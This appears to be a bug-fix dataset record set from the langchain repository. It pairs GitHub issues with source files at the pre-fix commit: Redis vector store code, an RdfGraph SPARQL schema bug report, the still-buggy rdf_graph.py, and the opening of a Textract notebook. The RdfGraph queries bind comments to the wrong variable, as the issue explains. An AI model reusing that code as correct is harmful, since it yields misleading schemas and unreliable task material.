kwargs.get("ids")) # type check for metadata if metadatas: if isinstance(metadatas, list) and len(metadatas) != len(texts): # type: ignore # noqa: E501 raise ValueError("Number of metadatas must match number of texts") if not (isinstance(metadatas, list) and isinstance(metadatas[0], dict)): raise ValueError("Metadatas must be a list of dicts") # Write data to redis pipeline = self.client.pipeline(transaction=False) for i, text in enumerate(texts): # Use provided values by default or fallback key = keys_or_ids[i] if keys_or_ids else _redis_key(prefix) metadata = metadatas[i] if metadatas else {} metadata = _prepare_metadata(metadata) if clean_metadata else metadata embedding = ( embeddings[i] if embeddings else self._embeddings.embed_query(text) ) pipeline.hset( key, mapping={ self._schema.content_key: text, self._schema.content_vector_key: _array_to_buffer( embedding, self._schema.vector_dtype ), **metadata, }, ) ids.append(key) # Write batch if i % batch_size == 0: pipeline.execute() # Cleanup final batch pipeline.execute() return ids def as_retriever(self, **kwargs: Any) -> RedisVectorStoreRetriever: tags = kwargs.pop("tags", None) or [] tags.extend(self._get_retriever_tags()) return RedisVectorStoreRetriever(vectorstore=self, **kwargs, tags=tags) @deprecated("0.0.272", alternative="similarity_search(distance_threshold=0.1)") def similarity_search_limit_score( self, query: str, k: int = 4, score_threshold: float = 0.2, **kwargs: Any ) -> List[Document]: """ Returns the most similar indexed documents to the query text within the score_threshold range. Deprecated: Use similarity_search with distance_threshold instead. Args: query (str): The query text for which to find similar documents. k (int): The number of documents to return. Default is 4. score_threshold (float): The minimum matching *distance* required for a document to be considered a match. Defaults to 0.2. Returns: List[Document]: A list of documents that are most similar to the query text including the match score for each document. Note: If there are no documents that satisfy the score_threshold value, an empty list is returned. """ return self.similarity_search( query, k=k, distance_threshold=score_threshold, **kwargs ) def similarity_search_with_score( self, query: str, k: int = 4, filter: Optional[RedisFilterExpression] = None, return_metadata: bool = True, **kwargs: Any, ) -> List[Tuple[Document, float]]: """Run similarity search with **vector distance**. The "scores" returned from this function are the raw vector distances from the query vector. For similarity scores, use ``similarity_search_with_relevance_scores``. Args: query (str): The query text for which to find similar documents. k (int): The number of documents to return. Default is 4. filter (RedisFilterExpression, optional): Optional metadata filter. Defaults to None. return_metadata (bool, optional): Whether to return metadata. Defaults to True. Returns: List[Tuple[Document, float]]: A list of documents that are most similar to the query with the distance for each document. """ try: import redis except ImportError as e: raise ImportError( "Could not import redis python package. " "Please install it with `pip install redis`." ) from e if "score_threshold" in kwargs: logger.warning( "score_threshold is deprecated. Use distance_threshold instead." + "score_threshold should only be used in " + "similarity_search_with_relevance_scores." + "score_threshold will be removed in a future release.", ) query_embedding = self._embeddings.embed_query(query) redis_query, params_dict = self._prepare_query( query_embedding, k=k, filter=filter, with_metadata=return_metadata, with_distance=True, **kwargs, ) # Perform vector search # ignore type because redis-py is wrong about bytes try: results = self.client.ft(self.index_name).search(redis_query, params_dict) # type: ignore # noqa: E501 except redis.exceptions.ResponseError as e: # split error message and see if it starts with "Syntax" if str(e).split(" ")[0] == "Syntax": raise ValueError( "Query failed with syntax error. " + "This is likely due to malformation of " + "filter, vector, or query argument" ) from e raise e # Prepare document results docs_with_scores: List[Tuple[Document, float]] = [] for result in results.docs: metadata = {} if return_metadata: metadata = {"id": result.id} metadata.update(self._collect_metadata(result)) doc = Document(page_content=result.content, metadata=metadata) distance = self._calculate_fp_distance(result.distance) docs_with_scores.append((doc, distance)) return docs_with_scores def similarity_search( self, query: str, k: int = 4, filter: Optional[RedisFilterExpression] = None, return_metadata: bool = True, distance_threshold: Optional[float] = None, **kwargs: Any, ) -> List[Document]: """Run similarity search Args: query (str): The query text for which to find similar documents. k (int): The number of documents to return. Default is 4. filter (RedisFilterExpression, optional): Optional metadata filter. Defaults to None. return_metadata (bool, optional): Whether to return metadata. Defaults to True. distance_threshold (Optional[float], optional): Maximum vector distance between selected documents and the query vector. Defaults to None. Returns: List[Document]: A list of documents that are most similar to the query text. """ query_embedding = self._embeddings.embed_query(query) return self.similarity_search_by_vector( query_embedding, k=k, filter=filter, return_metadata=return_metadata, distance_threshold=distance_threshold, **kwargs, ) def similarity_search_by_vector( self, embedding: List[float], k: int = 4, filter: Optional[RedisFilterExpression] = None, return_metadata: bool = True, distance_threshold: Optional[float] = None, **kwargs: Any, ) -> List[Document]: """Run similarity search between a query vector and the indexed vectors. Args: embedding (List[float]): The query vector for which to find similar documents. k (int): The number of documents to return. Default is 4. filter (RedisFilterExpression, optional): Optional metadata filter. Defaults to None. return_metadata (bool, optional): Whether to return metadata. Defaults to True. distance_threshold (Optional[float], optional): Maximum vector distance between selected documents and the query vector. Defaults to None. Returns: List[Document]: A list of documents that are most similar to the query text. """ try: import redis except ImportError as e: raise ImportError( "Could not import redis python package. " "Please install it with `pip install redis`." ) from e if "score_threshold" in kwargs: logger.warning( "score_threshold is deprecated. Use distance_threshold instead." + "score_threshold should only be used in " + "similarity_search_with_relevance_scores." + "score_threshold will be removed in a future release.", ) redis_query, params_dict = self._prepare_query( embedding, k=k, filter=filter, distance_threshold=distance_threshold, with_metadata=return_metadata, with_distance=False, ) # Perform vector search # ignore type because redis-py is wrong about bytes try: results = self.client.ft(self.index_name).search(redis_query, params_dict) # type: ignore # noqa: E501 except redis.exceptions.ResponseError as e: # split error message and see if it starts with "Syntax" if str(e).split(" ")[0] == "Syntax": raise ValueError( "Query failed with syntax error. " + "This is likely due to malformation of " + "filter, vector, or query argument" ) from e raise e # Prepare document results docs = [] for result in results.docs: metadata = {} if return_metadata: metadata = {"id": result.id} metadata.update(self._collect_metadata(result)) content_key = self._schema.content_key docs.append( Document(page_content=getattr(result, content_key), metadata=metadata) ) return docs def max_marginal_relevance_search( self, query: str, k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[RedisFilterExpression] = None, return_metadata: bool = True, distance_threshold: Optional[float] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: query (str): Text to look up documents similar to. k (int): Number of Documents to return. Defaults to 4. fetch_k (int): Number of Documents to fetch to pass to MMR algorithm. lambda_mult (float): Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. filter (RedisFilterExpression, optional): Optional metadata filter. Defaults to None. return_metadata (bool, optional): Whether to return metadata. Defaults to True. distance_threshold (Optional[float], optional): Maximum vector distance between selected documents and the query vector. Defaults to None. Returns: List[Document]: A list of Documents selected by maximal marginal relevance. """ # Embed the query query_embedding = self._embeddings.embed_query(query) # Fetch the initial documents prefetch_docs = self.similarity_search_by_vector( query_embedding, k=fetch_k, filter=filter, return_metadata=return_metadata, distance_threshold=distance_threshold, **kwargs, ) prefetch_ids = [doc.metadata["id"] for doc in prefetch_docs] # Get the embeddings for the fetched documents prefetch_embeddings = [ _buffer_to_array( cast( bytes, self.client.hget(prefetch_id, self._schema.content_vector_key), ), dtype=self._schema.vector_dtype, ) for prefetch_id in prefetch_ids ] # Select documents using maximal marginal relevance selected_indices = maximal_marginal_relevance( np.array(query_embedding), prefetch_embeddings, lambda_mult=lambda_mult, k=k ) selected_docs = [prefetch_docs[i] for i in selected_indices] return selected_docs def _collect_metadata(self, result: "Document") -> Dict[str, Any]: """Collect metadata from Redis. Method ensures that there isn't a mismatch between the metadata and the index schema passed to this class by the user or generated by this class. Args: result (Document): redis.commands.search.Document object returned from Redis. Returns: Dict[str, Any]: Collected metadata. """ # new metadata dict as modified by this method meta = {} for key in self._schema.metadata_keys: try: meta[key] = getattr(result, key) except AttributeError: # warning about attribute missing logger.warning( f"Metadata key {key} not found in metadata. " + "Setting to None. \n" + "Metadata fields defined for this instance: " + f"{self._schema.metadata_keys}" ) meta[key] = None return meta def _prepare_query( self, query_embedding: List[float], k: int = 4, filter: Optional[RedisFilterExpression] = None, distance_threshold: Optional[float] = None, with_metadata: bool = True, with_distance: bool = False, ) -> Tuple["Query", Dict[str, Any]]: # Creates Redis query params_dict: Dict[str, Union[str, bytes, float]] = { "vector": _array_to_buffer(query_embedding, self._schema.vector_dtype), } # prepare return fields including score return_fields = [self._schema.content_key] if with_distance: return_fields.append("distance") if with_metadata: return_fields.extend(self._schema.metadata_keys) if distance_threshold: params_dict["distance_threshold"] = distance_threshold return ( self._prepare_range_query( k, filter=filter, return_fields=return_fields ), params_dict, ) return ( self._prepare_vector_query(k, filter=filter, return_fields=return_fields), params_dict, ) def _prepare_range_query( self, k: int, filter: Optional[RedisFilterExpression] = None, return_fields: Optional[List[str]] = None, ) -> "Query": try: from redis.commands.search.query import Query except ImportError as e: raise ImportError( "Could not import redis python package. " "Please install it with `pip install redis`." ) from e return_fields = return_fields or [] vector_key = self._schema.content_vector_key base_query = f"@{vector_key}:[VECTOR_RANGE $distance_threshold $vector]" if filter: base_query = "(" + base_query + " " + str(filter) + ")" query_string = base_query + "=>{$yield_distance_as: distance}" return ( Query(query_string) .return_fields(*return_fields) .sort_by("distance") .paging(0, k) .dialect(2) ) def _prepare_vector_query( self, k: int, filter: Optional[RedisFilterExpression] = None, return_fields: Optional[List[str]] = None, ) -> "Query": """Prepare query for vector search. Args: k: Number of results to return. filter: Optional metadata filter. Returns: query: Query object. """ try: from redis.commands.search.query import Query except ImportError as e: raise ImportError( "Could not import redis python package. " "Please install it with `pip install redis`." ) from e return_fields = return_fields or [] query_prefix = "*" if filter: query_prefix = f"{str(filter)}" vector_key = self._schema.content_vector_key base_query = f"({query_prefix})=>[KNN {k} @{vector_key} $vector AS distance]" query = ( Query(base_query) .return_fields(*return_fields) .sort_by("distance") .paging(0, k) .dialect(2) ) return query def _get_schema_with_defaults( self, index_schema: Optional[Union[Dict[str, str], str, os.PathLike]] = None, vector_schema: Optional[Dict[str, Union[str, int]]] = None, ) -> "RedisModel": # should only be called after init of Redis (so Import handled) from langchain.vectorstores.redis.schema import RedisModel, read_schema schema = RedisModel() # read in schema (yaml file or dict) and # pass to the Pydantic validators if index_schema: schema_values = read_schema(index_schema) schema = RedisModel(**schema_values) # ensure user did not exclude the content field # no modifications if content field found schema.add_content_field() # if no content_vector field, add vector field to schema # this makes adding a vector field to the schema optional when # the user just wants additional metadata try: # see if user overrode the content vector schema.content_vector # if user overrode the content vector, check if they # also passed vector schema. This won't be used since # the index schema overrode the content vector if vector_schema: logger.warning( "`vector_schema` is ignored since content_vector is " + "overridden in `index_schema`." ) # user did not override content vector except ValueError: # set default vector schema and update with user provided schema # if the user provided any vector_field = self.DEFAULT_VECTOR_SCHEMA.copy() if vector_schema: vector_field.update(vector_schema) # add the vector field either way schema.add_vector_field(vector_field) return schema def _create_index(self, dim: int = 1536) -> None: try: from redis.commands.search.indexDefinition import ( # type: ignore IndexDefinition, IndexType, ) except ImportError: raise ImportError( "Could not import redis python package. " "Please install it with `pip install redis`." ) # Set vector dimension # can't obtain beforehand because we don't # know which embedding model is being used. self._schema.content_vector.dims = dim # Check if index exists if not check_index_exists(self.client, self.index_name): prefix = _redis_prefix(self.index_name) # Create Redis Index self.client.ft(self.index_name).create_index( fields=self._schema.get_fields(), definition=IndexDefinition(prefix=[prefix], index_type=IndexType.HASH), ) def _calculate_fp_distance(self, distance: str) -> float: """Calculate the distance based on the vector datatype Two datatypes supported: - FLOAT32 - FLOAT64 if it's FLOAT32, we need to round the distance to 4 decimal places otherwise, round to 7 decimal places. """ if self._schema.content_vector.datatype == "FLOAT32": return round(float(distance), 4) return round(float(distance), 7) def _check_deprecated_kwargs(self, kwargs: Mapping[str, Any]) -> None: """Check for deprecated kwargs.""" deprecated_kwargs = { "redis_host": "redis_url", "redis_port": "redis_url", "redis_password": "redis_url", "content_key": "index_schema", "vector_key": "vector_schema", "distance_metric": "vector_schema", } for key, value in kwargs.items(): if key in deprecated_kwargs: raise ValueError( f"Keyword argument '{key}' is deprecated. " f"Please use '{deprecated_kwargs[key]}' instead." ) def _select_relevance_score_fn(self) -> Callable[[float], float]: if self.relevance_score_fn: return self.relevance_score_fn metric_map = { "COSINE": self._cosine_relevance_score_fn, "IP": self._max_inner_product_relevance_score_fn, "L2": self._euclidean_relevance_score_fn, } try: return metric_map[self._schema.content_vector.distance_metric] except KeyError: return _default_relevance_score def _generate_field_schema(data: Dict[str, Any]) -> Dict[str, Any]: """ Generate a schema for the search index in Redis based on the input metadata. Given a dictionary of metadata, this function categorizes each metadata field into one of the three categories: - text: The field contains textual data. - numeric: The field contains numeric data (either integer or float). - tag: The field contains list of tags (strings). Args data (Dict[str, Any]): A dictionary where keys are metadata field names and values are the metadata values. Returns: Dict[str, Any]: A dictionary with three keys "text", "numeric", and "tag". Each key maps to a list of fields that belong to that category. Raises: ValueError: If a metadata field cannot be categorized into any of the three known types. """ result: Dict[str, Any] = { "text": [], "numeric": [], "tag": [], } for key, value in data.items(): # Numeric fields try: int(value) result["numeric"].append({"name": key}) continue except (ValueError, TypeError): pass # None values are not indexed as of now if value is None: continue # if it's a list of strings, we assume it's a tag if isinstance(value, (list, tuple)): if not value or isinstance(value[0], str): result["tag"].append({"name": key}) else: name = type(value[0]).__name__ raise ValueError( f"List/tuple values should contain strings: '{key}': {name}" ) continue # Check if value is string before processing further if isinstance(value, str): result["text"].append({"name": key}) continue # Unable to classify the field value name = type(value).__name__ raise ValueError( "Could not generate Redis index field type mapping " + f"for metadata: '{key}': {name}" ) return result def _prepare_metadata(metadata: Dict[str, Any]) -> Dict[str, Any]: """ Prepare metadata for indexing in Redis by sanitizing its values. - String, integer, and float values remain unchanged. - None or empty values are replaced with empty strings. - Lists/tuples of strings are joined into a single string with a comma separator. Args: metadata (Dict[str, Any]): A dictionary where keys are metadata field names and values are the metadata values. Returns: Dict[str, Any]: A sanitized dictionary ready for indexing in Redis. Raises: ValueError: If any metadata value is not one of the known types (string, int, float, or list of strings). """ def raise_error(key: str, value: Any) -> None: raise ValueError( f"Metadata value for key '{key}' must be a string, int, " + f"float, or list of strings. Got {type(value).__name__}" ) clean_meta: Dict[str, Union[str, float, int]] = {} for key, value in metadata.items(): if not value: clean_meta[key] = "" continue # No transformation needed if isinstance(value, (str, int, float)): clean_meta[key] = value # if it's a list/tuple of strings, we join it elif isinstance(value, (list, tuple)): if not value or isinstance(value[0], str): clean_meta[key] = REDIS_TAG_SEPARATOR.join(value) else: raise_error(key, value) else: raise_error(key, value) return clean_meta class RedisVectorStoreRetriever(VectorStoreRetriever): """Retriever for Redis VectorStore.""" vectorstore: Redis """Redis VectorStore.""" search_type: str = "similarity" """Type of search to perform. Can be either 'similarity', 'similarity_distance_threshold', 'similarity_score_threshold' """ search_kwargs: Dict[str, Any] = { "k": 4, "score_threshold": 0.9, # set to None to avoid distance used in score_threshold search "distance_threshold": None, } """Default search kwargs.""" allowed_search_types = [ "similarity", "similarity_distance_threshold", "similarity_score_threshold", "mmr", ] """Allowed search types.""" class Config: """Configuration for this pydantic object.""" arbitrary_types_allowed = True def _get_relevant_documents( self, query: str, *, run_manager: CallbackManagerForRetrieverRun ) -> List[Document]: if self.search_type == "similarity": docs = self.vectorstore.similarity_search(query, **self.search_kwargs) elif self.search_type == "similarity_distance_threshold": if self.search_kwargs["distance_threshold"] is None: raise ValueError( "distance_threshold must be provided for " + "similarity_distance_threshold retriever" ) docs = self.vectorstore.similarity_search(query, **self.search_kwargs) elif self.search_type == "similarity_score_threshold": docs_and_similarities = ( self.vectorstore.similarity_search_with_relevance_scores( query, **self.search_kwargs ) ) docs = [doc for doc, _ in docs_and_similarities] elif self.search_type == "mmr": docs = self.vectorstore.max_marginal_relevance_search( query, **self.search_kwargs ) else: raise ValueError(f"search_type of {self.search_type} not allowed.") return docs async def _aget_relevant_documents( self, query: str, *, run_manager: AsyncCallbackManagerForRetrieverRun ) -> List[Document]: raise NotImplementedError("RedisVectorStoreRetriever does not support async") def add_documents(self, documents: List[Document], **kwargs: Any) -> List[str]: """Add documents to vectorstore.""" return self.vectorstore.add_documents(documents, **kwargs) async def aadd_documents( self, documents: List[Document], **kwargs: Any ) -> List[str]: """Add documents to vectorstore.""" return await self.vectorstore.aadd_documents(documents, **kwargs)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,907
RdfGraph schema retrieval queries for the relation types are not linked by the correct comment variable
### System Info langchain = 0.0.251 Python = 3.10.11 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. Create an OWL ontology called `dbpedia_sample.ttl` with the following: ``` turtle @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> . @prefix dcterms: <http://purl.org/dc/terms/> . @prefix wikidata: <http://www.wikidata.org/entity/> . @prefix owl: <http://www.w3.org/2002/07/owl#> . @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> . @prefix prov: <http://www.w3.org/ns/prov#> . @prefix : <http://dbpedia.org/ontology/> . :Actor a owl:Class ; rdfs:comment "An actor or actress is a person who acts in a dramatic production and who works in film, television, theatre, or radio in that capacity."@en ; rdfs:label "actor"@en ; rdfs:subClassOf :Artist ; owl:equivalentClass wikidata:Q33999 ; prov:wasDerivedFrom <http://mappings.dbpedia.org/index.php/OntologyClass:Actor> . :AdministrativeRegion a owl:Class ; rdfs:comment "A PopulatedPlace under the jurisdiction of an administrative body. This body may administer either a whole region or one or more adjacent Settlements (town administration)"@en ; rdfs:label "administrative region"@en ; rdfs:subClassOf :Region ; owl:equivalentClass <http://schema.org/AdministrativeArea>, wikidata:Q3455524 ; prov:wasDerivedFrom <http://mappings.dbpedia.org/index.php/OntologyClass:AdministrativeRegion> . :birthPlace a rdf:Property, owl:ObjectProperty ; rdfs:comment "where the person was born"@en ; rdfs:domain :Animal ; rdfs:label "birth place"@en ; rdfs:range :Place ; rdfs:subPropertyOf dul:hasLocation ; owl:equivalentProperty <http://schema.org/birthPlace>, wikidata:P19 ; prov:wasDerivedFrom <http://mappings.dbpedia.org/index.php/OntologyProperty:birthPlace> . ``` 2. Run ``` python from langchain.graphs import RdfGraph graph = RdfGraph( source_file="dbpedia_sample.ttl", serialization="ttl", standard="owl" ) print(graph.get_schema) ``` 3. Output ``` In the following, each IRI is followed by the local name and optionally its description in parentheses. The OWL graph supports the following node types: <http://dbpedia.org/ontology/Actor> (Actor, An actor or actress is a person who acts in a dramatic production and who works in film, television, theatre, or radio in that capacity.), <http://dbpedia.org/ontology/AdministrativeRegion> (AdministrativeRegion, A PopulatedPlace under the jurisdiction of an administrative body. This body may administer either a whole region or one or more adjacent Settlements (town administration)) The OWL graph supports the following object properties, i.e., relationships between objects: <http://dbpedia.org/ontology/birthPlace> (birthPlace, An actor or actress is a person who acts in a dramatic production and who works in film, television, theatre, or radio in that capacity.), <http://dbpedia.org/ontology/birthPlace> (birthPlace, A PopulatedPlace under the jurisdiction of an administrative body. This body may administer either a whole region or one or more adjacent Settlements (town administration)), <http://dbpedia.org/ontology/birthPlace> (birthPlace, where the person was born) The OWL graph supports the following data properties, i.e., relationships between objects and literals: ``` ### Expected behavior The issue is that in the SPARQL queries getting the properties the `rdfs:comment` triple pattern always refers to the variable `?cls` which obviously comes from copy/paste code. For example, getting the RDFS properties via ``` python rel_query_rdf = prefixes["rdfs"] + ( """SELECT DISTINCT ?rel ?com\n""" """WHERE { \n""" """ ?subj ?rel ?obj . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) ``` you can see that the `OPTIONAL` clause refers to `?cls`, but it should be `?rel`. The same holds for all other queries regarding properties. The current status leads to a cartesian product of properties and all `rdfs:comment` vlaues in the dataset, which can be horribly large and of course leads to misleading and huge prompts (see the output of my sample in the "reproduction" part)
https://github.com/langchain-ai/langchain/issues/8907
https://github.com/langchain-ai/langchain/pull/9136
d9f1bcf366b5a66021d246d8e9c56e76fe60ead1
cce132d1460b4f52541cb4a6f13219fb8fe4f907
"2023-08-08T10:57:54Z"
python
"2023-10-25T20:36:57Z"
libs/langchain/langchain/graphs/rdf_graph.py
from __future__ import annotations from typing import ( TYPE_CHECKING, List, Optional, ) if TYPE_CHECKING: import rdflib prefixes = { "owl": """PREFIX owl: <http://www.w3.org/2002/07/owl#>\n""", "rdf": """PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\n""", "rdfs": """PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n""", "xsd": """PREFIX xsd: <http://www.w3.org/2001/XMLSchema#>\n""", } cls_query_rdf = prefixes["rdfs"] + ( """SELECT DISTINCT ?cls ?com\n""" """WHERE { \n""" """ ?instance a ?cls . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) cls_query_rdfs = prefixes["rdfs"] + ( """SELECT DISTINCT ?cls ?com\n""" """WHERE { \n""" """ ?instance a/rdfs:subClassOf* ?cls . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) cls_query_owl = prefixes["rdfs"] + ( """SELECT DISTINCT ?cls ?com\n""" """WHERE { \n""" """ ?instance a/rdfs:subClassOf* ?cls . \n""" """ FILTER (isIRI(?cls)) . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) rel_query_rdf = prefixes["rdfs"] + ( """SELECT DISTINCT ?rel ?com\n""" """WHERE { \n""" """ ?subj ?rel ?obj . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) rel_query_rdfs = ( prefixes["rdf"] + prefixes["rdfs"] + ( """SELECT DISTINCT ?rel ?com\n""" """WHERE { \n""" """ ?rel a/rdfs:subPropertyOf* rdf:Property . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) ) op_query_owl = ( prefixes["rdfs"] + prefixes["owl"] + ( """SELECT DISTINCT ?op ?com\n""" """WHERE { \n""" """ ?op a/rdfs:subPropertyOf* owl:ObjectProperty . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) ) dp_query_owl = ( prefixes["rdfs"] + prefixes["owl"] + ( """SELECT DISTINCT ?dp ?com\n""" """WHERE { \n""" """ ?dp a/rdfs:subPropertyOf* owl:DatatypeProperty . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) ) class RdfGraph: """RDFlib wrapper for graph operations. Modes: * local: Local file - can be queried and changed * online: Online file - can only be queried, changes can be stored locally * store: Triple store - can be queried and changed if update_endpoint available Together with a source file, the serialization should be specified. *Security note*: Make sure that the database connection uses credentials that are narrowly-scoped to only include necessary permissions. Failure to do so may result in data corruption or loss, since the calling code may attempt commands that would result in deletion, mutation of data if appropriately prompted or reading sensitive data if such data is present in the database. The best way to guard against such negative outcomes is to (as appropriate) limit the permissions granted to the credentials used with this tool. See https://python.langchain.com/docs/security for more information. """ def __init__( self, source_file: Optional[str] = None, serialization: Optional[str] = "ttl", query_endpoint: Optional[str] = None, update_endpoint: Optional[str] = None, standard: Optional[str] = "rdf", local_copy: Optional[str] = None, ) -> None: """ Set up the RDFlib graph :param source_file: either a path for a local file or a URL :param serialization: serialization of the input :param query_endpoint: SPARQL endpoint for queries, read access :param update_endpoint: SPARQL endpoint for UPDATE queries, write access :param standard: RDF, RDFS, or OWL :param local_copy: new local copy for storing changes """ self.source_file = source_file self.serialization = serialization self.query_endpoint = query_endpoint self.update_endpoint = update_endpoint self.standard = standard self.local_copy = local_copy try: import rdflib from rdflib.graph import DATASET_DEFAULT_GRAPH_ID as default from rdflib.plugins.stores import sparqlstore except ImportError: raise ValueError( "Could not import rdflib python package. " "Please install it with `pip install rdflib`." ) if self.standard not in (supported_standards := ("rdf", "rdfs", "owl")): raise ValueError( f"Invalid standard. Supported standards are: {supported_standards}." ) if ( not source_file and not query_endpoint or source_file and (query_endpoint or update_endpoint) ): raise ValueError( "Could not unambiguously initialize the graph wrapper. " "Specify either a file (local or online) via the source_file " "or a triple store via the endpoints." ) if source_file: if source_file.startswith("http"): self.mode = "online" else: self.mode = "local" if self.local_copy is None: self.local_copy = self.source_file self.graph = rdflib.Graph() self.graph.parse(source_file, format=self.serialization) if query_endpoint: self.mode = "store" if not update_endpoint: self._store = sparqlstore.SPARQLStore() self._store.open(query_endpoint) else: self._store = sparqlstore.SPARQLUpdateStore() self._store.open((query_endpoint, update_endpoint)) self.graph = rdflib.Graph(self._store, identifier=default) # Verify that the graph was loaded if not len(self.graph): raise AssertionError("The graph is empty.") # Set schema self.schema = "" self.load_schema() @property def get_schema(self) -> str: """ Returns the schema of the graph database. """ return self.schema def query( self, query: str, ) -> List[rdflib.query.ResultRow]: """ Query the graph. """ from rdflib.exceptions import ParserError from rdflib.query import ResultRow try: res = self.graph.query(query) except ParserError as e: raise ValueError("Generated SPARQL statement is invalid\n" f"{e}") return [r for r in res if isinstance(r, ResultRow)] def update( self, query: str, ) -> None: """ Update the graph. """ from rdflib.exceptions import ParserError try: self.graph.update(query) except ParserError as e: raise ValueError("Generated SPARQL statement is invalid\n" f"{e}") if self.local_copy: self.graph.serialize( destination=self.local_copy, format=self.local_copy.split(".")[-1] ) else: raise ValueError("No target file specified for saving the updated file.") @staticmethod def _get_local_name(iri: str) -> str: if "#" in iri: local_name = iri.split("#")[-1] elif "/" in iri: local_name = iri.split("/")[-1] else: raise ValueError(f"Unexpected IRI '{iri}', contains neither '#' nor '/'.") return local_name def _res_to_str(self, res: rdflib.query.ResultRow, var: str) -> str: return ( "<" + str(res[var]) + "> (" + self._get_local_name(res[var]) + ", " + str(res["com"]) + ")" ) def load_schema(self) -> None: """ Load the graph schema information. """ def _rdf_s_schema( classes: List[rdflib.query.ResultRow], relationships: List[rdflib.query.ResultRow], ) -> str: return ( f"In the following, each IRI is followed by the local name and " f"optionally its description in parentheses. \n" f"The RDF graph supports the following node types:\n" f'{", ".join([self._res_to_str(r, "cls") for r in classes])}\n' f"The RDF graph supports the following relationships:\n" f'{", ".join([self._res_to_str(r, "rel") for r in relationships])}\n' ) if self.standard == "rdf": clss = self.query(cls_query_rdf) rels = self.query(rel_query_rdf) self.schema = _rdf_s_schema(clss, rels) elif self.standard == "rdfs": clss = self.query(cls_query_rdfs) rels = self.query(rel_query_rdfs) self.schema = _rdf_s_schema(clss, rels) elif self.standard == "owl": clss = self.query(cls_query_owl) ops = self.query(op_query_owl) dps = self.query(dp_query_owl) self.schema = ( f"In the following, each IRI is followed by the local name and " f"optionally its description in parentheses. \n" f"The OWL graph supports the following node types:\n" f'{", ".join([self._res_to_str(r, "cls") for r in clss])}\n' f"The OWL graph supports the following object properties, " f"i.e., relationships between objects:\n" f'{", ".join([self._res_to_str(r, "op") for r in ops])}\n' f"The OWL graph supports the following data properties, " f"i.e., relationships between objects and literals:\n" f'{", ".join([self._res_to_str(r, "dp") for r in dps])}\n' ) else: raise ValueError(f"Mode '{self.standard}' is currently not supported.")
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
12,068
feat: Add Linearized output to Textract PDFLoader
### Feature request Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies different layout elements like tables, lists, figures, text-paragraphs and titles. This should be used by the AmazonTextractPDFParser to generate a linearized output to improve downstream LLMs accuracy with those hints. Text output should render tables and key/value pairs and text in reading order for multi-column text and prefix lists with a *, when features like LAYOUT, TABLES, FORMS are passed to the textract call ### Motivation Improve downstream LLM accuracy ### Your contribution I'll submit a PR for this feature.
https://github.com/langchain-ai/langchain/issues/12068
https://github.com/langchain-ai/langchain/pull/12446
a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445
0c7f1d8b219e87e3ffd14a15a452622c532c7e95
"2023-10-20T08:28:07Z"
python
"2023-10-31T01:02:10Z"
docs/docs/integrations/document_loaders/pdf-amazonTextractPDFLoader.ipynb
{ "cells": [ { "cell_type": "markdown", "id": "1f3cebbe-079a-4bfe-b1a1-07bdac882ce2", "metadata": {}, "source": [ "# Amazon Textract \n", "\n", "Amazon Textract is a machine learning (ML) service that automatically extracts text, handwriting, and data from scanned documents. It goes beyond simple optical character recognition (OCR) to identify, understand, and extract data from forms and tables. Today, many companies manually extract data from scanned documents such as PDFs, images, tables, and forms, or through simple OCR software that requires manual configuration (which often must be updated when the form changes). To overcome these manual and expensive processes, Textract uses ML to read and process any type of document, accurately extracting text, handwriting, tables, and other data with no manual effort. You can quickly automate document processing and act on the information extracted, whether you’re automating loans processing or extracting information from invoices and receipts. Textract can extract the data in minutes instead of hours or days.\n", "\n", "This sample demonstrates the use of Amazon Textract in combination with LangChain as a DocumentLoader.\n", "\n", "Textract supports PDF, TIFF, PNG and JPEG format.\n", "\n", "Check https://docs.aws.amazon.com/textract/latest/dg/limits-document.html for supported document sizes, languages and characters." ] }, { "cell_type": "code", "execution_count": 1, "id": "c049beaf-f904-4ce6-91ca-805da62084c2", "metadata": { "tags": [] }, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "\n", "\u001b[1m[\u001b[0m\u001b[34;49mnotice\u001b[0m\u001b[1;39;49m]\u001b[0m\u001b[39;49m A new release of pip is available: \u001b[0m\u001b[31;49m23.2\u001b[0m\u001b[39;49m -> \u001b[0m\u001b[32;49m23.2.1\u001b[0m\n", "\u001b[1m[\u001b[0m\u001b[34;49mnotice\u001b[0m\u001b[1;39;49m]\u001b[0m\u001b[39;49m To update, run: \u001b[0m\u001b[32;49mpython -m pip install --upgrade pip\u001b[0m\n" ] } ], "source": [ "!pip install langchain boto3 openai tiktoken python-dotenv -q" ] }, { "cell_type": "markdown", "id": "400b25c6-befa-4730-a201-39ff112c8858", "metadata": {}, "source": [ "## Sample 1\n", "\n", "The first example uses a local file, which internally will be send to Amazon Textract sync API 